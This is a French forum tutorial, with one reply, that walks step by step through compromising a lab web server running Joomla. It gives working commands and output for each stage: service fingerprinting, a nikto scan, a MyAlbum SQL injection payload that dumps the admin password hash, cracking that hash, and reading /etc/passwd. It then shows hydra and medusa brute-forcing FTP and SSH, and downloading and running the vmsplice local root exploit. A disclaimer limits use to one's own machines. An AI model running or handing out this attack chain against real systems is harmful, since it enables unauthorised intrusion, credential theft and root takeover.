Tester le sécuritée d'un serveur

mactux

Administrateur

Membre primordial

Inscription: juillet 2011
Messages: 515

05 août 2011, 16h11

Nous allons commencer par utiliser quelques outils pour collecter des infos sur le server.
que l'on cible ::

- httprint
- dimitry http://wiki.backtrack-fr.net/index.php/DMitry
- nmap http://wiki.backtrack-fr.net/index.php/Nmap
- amap http://wiki.backtrack-fr.net/index.php/Amap

Code:

Code:

bt linux # httprint -h 192.168.1.44 -s signatures.txt
httprint v0.301 (beta) - web server fingerprinting tool
(c) 2003-2005 net-square solutions pvt. ltd. - see readme.txt
http://net-square.com/httprint/
[email protected]

Finger Printing on http://192.168.1.44:80/
Finger Printing Completed on http://192.168.1.44:80/
--------------------------------------------------
Host: 192.168.1.44
Derived Signature:
Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8
811C9DC568D17AAE811C9DC5811C9DC5811C9DC5505FCFE84276E4BB630A04DB
0D7645B5811C9DC5811C9DC5CD37187C811C9DC5811C9DC5811C9DC5811C9DC5
68D17AAE68D17AAE68D17AAE811C9DC5E2CE6927050C5D3368D17AAE9E431BC8
6ED3C29568D17AAE2A200B4C68D17AAE68D17AAE68D17AAE68D17AAEE2CE6923
E2CE692368D17AAE811C9DC5E2CE6927E2CE6923

Banner Reported: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8
Banner Deduced: Lotus-Domino/6.x
Score: 92
Confidence: 55.42
------------------------

Code:

Code:

bt ~ # dmitry -p -b 192.168.1.44
Deepmagic Information Gathering Tool
"There be some deep magic going on"

HostIP:192.168.1.44
HostName:joomla12

Gathered TCP Port information for 192.168.1.44
---------------------------------

Port State
21/tcp open
>> 220 Welc0m3 To The SUp3r S3cuRe's Ftp S3rVer
22/tcp open
>> SSH-2.0-OpenSSH_4.3p2 Debian-9
80/tcp open
.....

Code:

Code:

bt bin # amap -bvq 192.168.1.44 80
Using trigger file /usr/local/etc/appdefs.trig ... loaded 30 triggers
Using response file /usr/local/etc/appdefs.resp ... loaded 346 responses
Using trigger file /usr/local/etc/appdefs.rpc ... loaded 450 triggers

amap v5.2 (www.thc.org/thc-amap) started at 2008-09-15 17:35:02 - MAPPING mode

Total amount of tasks to perform in plain connect mode: 23
Waiting for timeout on 23 connections ...
Protocol on 192.168.1.44:80/tcp (by trigger http) matches http - banner: HTTP/1.1 302 Found\r\nDate Mon, 15 Sep 2008 172821 GMT\r\nServer Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8\r\nLocation http//127.0.1.1/apache2-default/\r\nContent-Length 368\r\nConnection close\r\n
....
amap v5.2 finished at 2008-09-15 17:35:11

Code:

Code:

bt ~ # nmap -sSV -P0 192.168.1.44

Starting Nmap 4.50 ( http://insecure.org ) at 2008-09-15 17:44 CEST
Interesting ports on joomla12 (192.168.1.44):
Not shown: 1706 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd or WU-FTPD
22/tcp open ssh OpenSSH 4.3p2 Debian 9 (protocol 2.0)
80/tcp open http Apache httpd 2.2.3 ((Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.Cool
111/tcp open rpcbind 2 (rpc #100000)
113/tcp open ident OpenBSD identd
MAC Address: 00:02:A5:23:CE:94 (Compaq Com****r)
Service Info: OSs: Linux, OpenBSD

Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.378 seconds

Suite à cette collecte d'information nous constatons que nous avons un Server web Apache 2.2.3, sur une machine debian etch, avec un service ftp VSFTPD ou WU-ftpd et un service ssh openSSH.

Nous allons donc maintenant tester le site web tournant sur cette machine avec nikto.

- nikto http://wiki.backtrack-fr.net/index.php/Nikto

Code:

Code:

bt nikto # ./nikto.pl -e 1 -host http://192.168.1.44/joomla12 -F txt -o nickojoom.txt
---------------------------------------------------------------------------
- Nikto 2.01/2.01 - cirt.net
+ Target IP: 192.168.1.44
+ Target Hostname: joomla12
+ Target Port: 80
+ Using IDS Evasion: Random URI encoding (non-UTF8)
+ Start Time: 2008-09-16 10:26:17
---------------------------------------------------------------------------
+ Server: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch10 mod_perl/2.0.2 Perl/v5.8.8
+ No CGI Directories found (use '-C all' to force check all possible dirs)
- Root page / redirects to: http://joomla12/apache2-default/
- Retrieved X-Powered-By header: PHP/5.2.0-8+etch10
+ /robots.txt - contains 13 'disallow' entries which should be manually viewed (added to mutation file lists) (GET).
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP method ('Allow' Header): 'TRACE' is typically only used for debugging and should be disabled. This message does not mean it is vulnerable to XST.
+ PHP/5.2.0-8+etch10 appears to be outdated (current is at least 5.2.4)
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.2.6). Apache 1.3.39 and 2.0.61 are also current.
+ mod_python/3.2.10 appears to be outdated (current is at least 3.3.1)
+ PHP/5.2.0-8+etch10 appears to be outdated (current is at least 5.2.4)
+ mod_perl/2.0.2 appears to be outdated (current is at least 5.8.0)
+ OSVDB-0: GET /joomla12/help/ : Help directory should not be accessible
+ OSVDB-0: GET /joomla12/index.php?module=My_eGallery : My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.
+ OSVDB-8193: GET /joomla12/index.php?module=ew_filemanager&type=admin&func=manager&pathext=../../../etc : EW FileManager for PostNuke allows arbitrary file retrieval.
+ OSVDB-12184: GET /joomla12/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 : PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.
+ OSVDB-3092: GET /joomla12/administrator/ : This might be interesting...
+ OSVDB-3092: GET /joomla12/includes/ : This might be interesting...
+ OSVDB-3093: GET /joomla12/index.php?base=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?IDAdmin=test : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?pymembs=admin : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?SqlQuery=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?tampon=test%20 : This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /joomla12/index.php?topic=&amp;lt;script&amp;gt;alert(document
+ OSVDB-3761: GET /joomla12/?pattern=/etc/*&sort=name : The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl.
+ 2963 items checked: 22 item(s) reported on remote host
+ End Time: 2008-09-16 10:27:08 (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Le rapport nous informe qu'il pourrait y avoir des vulnérabilité. A nous de les tester et de les découvrir :P
Code:

+ OSVDB-0: GET /joomla12/index.php?module=My_eGallery : My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.

On va commencer par cela et en surfant sur le site on découvre le nom du composant joomla qui est MyAlbum
(hxxp://192.168.1.44/joomla12/index.php?option=com_myalbum&Itemid=26)

Une petite recherche sur milw0rm nous permettra de trouver un exploit s'il existe.

Code:

bt Desktop # ./milwormsearch.sh Joomla myalbum
************************************************
* Explorateur d'exploit sur Milw0rm *
* by s3th *
************************************************

exploit: Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability
Link : http://www.milw0rm.com/exploits/5318
Voulez-vous afficher l'exploit dans firefox (F) ou à l'écran (E) ou quitter (Q) :
e
<html><head><title>Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability</title></head><pre>-------------------------------------------------------------------------------------------------
# Title : Joomla Component MyAlbum SQL Injection Vulnerability
# Author : parad0x
# D.Page : http://joomlacode.org/gf/project/myalbum/
-------------------------------------------------------------------------------------------------
http://[target]/index.php?option=com_myalbum&album=[SQL]

-------------------------------------------------------------------------------------------------
Example:

http://www.akparti.org.tr/disiliskil...%20jos_users/*

-------------------------------------------------------------------------------------------------
greetz : VoLqaN
-------------------------------------------------------------------------------------------------
http://inso.spam-site.www

# milw0rm.com [2008-03-28]</pre></html>

Nous allons donc tester cette injection sur notre site : -1+union+select+0,concat(username,char(32),password),2,3,4%20from%20jos_users/*

Code:

http://192.168.1.44/joomla12/index.p...%20jos_users/*

et décvouvrir le pass admin

qui est un MD5

admin e10adc3949ba59abbe56e057f20f883e

Nous allons voir pourquoi il est important de bien choisir son mot de passe, car si le mot est trop faible il sera cassé par un soft comme johntheripper ou alors il existera dans une base de crack en ligne.

- johntheripper http://wiki.backtrack-fr.net/index.php/John_The_Ripper

Code:

bt Desktop # ./md5crack.sh e10adc3949ba59abbe56e057f20f883e
************************************************
* MD5crack online *
* by s3th *
************************************************

Plain text: 123456

Maintenant que nous avons la possiblité de nous logguer en tant qu'admin sur le site, il ne nous reste plus qu'à uploader un script qui nous permette de lancer des commande shell ou une Backdoor et rechercher des infos intéressantes sur le server..

cat /etc/passwd

Code:

s3th:x:1000:1000:s3th,,,:/home/s3th:/bin/bash
mysql:x:109:114:MySQL Server,,,:/var/lib/mysql:/bin/false
ftp:x:110:65534::/home/ftp:/bin/false
ftpuser:x:1001:1001::/home/ftpuser:/bin/bash
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
snort:x:112:115:Snort IDS:/var/log/snort:/bin/false

uname -a

Code:

Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686 GNU/Linux

Maintenant que nous avons un user "s3th" on va pouvoir faire une attaque sur le ftp ou le ssh avec :

- hydra http://wiki.backtrack-fr.net/index.php/Hydra/Hydra-gtk
- medusa

Code:

bt Desktop # hydra -l s3th -P ../arbeit/dict 192.168.1.44 ftp
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2008-09-17 11:21:39
[DATA] 16 tasks, 1 servers, 30206 login tries (l:1/p:30206), ~1887 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.44 login: s3th password: 123456
[STATUS] attack finished for 192.168.1.44 (waiting for childs to finish)
[21][ftp] host: 192.168.1.44 login: s3th password: 123456
Hydra (http://www.thc.org) finished at 2008-09-17 11:21:46

Code:

Code:

bt Desktop # medusa -h 192.168.1.44 -u s3th -P ../arbeit/dict -M ssh
Medusa v1.4 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <[email protected]>

ACCOUNT CHECK: [ssh] Host: 192.168.1.44 (1/1) User: s3th (1/1) Password: 1234 (1/30206)
ACCOUNT CHECK: [ssh] Host: 192.168.1.44 (1/1) User: s3th (1/1) Password: 123456 (2/30206)
ACCOUNT FOUND: [ssh] Host: 192.168.1.44 User: s3th Password: 123456 [SUCCESS]

maintenant qu'on a un compte et un pass SSH, il ne nous reste plus qu'à nous logguer:
Code:

bt ~ # ssh [email protected]
[email protected]'s password:
Linux debian 2.6.18-4-686 #1 SMP Mon Mar 26 17:17:36 UTC 2007 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have new mail.
Last login: Mon Sep 15 11:28:45 2008

voila il ne nous reste plus qu'à trouver un pti sploit

Code:

Code:

[email protected]:~$ whoami
s3th
[email protected]:~$ cd /tmp/
[email protected]:/tmp$ wget 192.168.1.39/vmsplice-local-root-exploit.c
--13:21:50-- http://192.168.1.39/vmsplice-local-root-exploit.c
=> `vmsplice-local-root-exploit.c'
Connexion vers 192.168.1.39:80...connectÃ©.
requÃªte HTTP transmise, en attente de la rÃ©ponse...200 OK
Longueur: 6'293 (6.1K) [text/x-c]

100%[=============================================================================================>] 6'293 --.--K/s

13:22:42 (198.77 KB/s) - Â« vmsplice-local-root-exploit.c Â» sauvegardÃ© [6293/6293]

[email protected]:/tmp$ gcc -o vmsplice-local-root-exploit vmsplice-local-root-exploit.c
[email protected]:/tmp$ ./vmsplice-local-root-exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e32000 .. 0xb7e64000
[+] root
[email protected]:/tmp# whoami
root

Ce tuto n'a pour but que d'informer qu'un système mal configuré est vulnérable .
N'essayez pas ces techniques sur des machines ne vous appartenant pas.
Tout ce que vous faites sera loggé sur la machine.

src:bt-fr.net

mactux †|

Le savoir n'est réel que s'il est partagé

Tags: Aucun(e)

samirdu91

Hackadémicien

Membre arrivant

Inscription: février 2015

Messages: 25
- Partager
- Tweet
#2

06 juillet 2015, 02h14

Très bon tutoriel merci à toi .
Commentaire

Précédent template Suivante

Annonce

Tester le sécuritée d'un serveur

Tester le sécuritée d'un serveur

Commentaire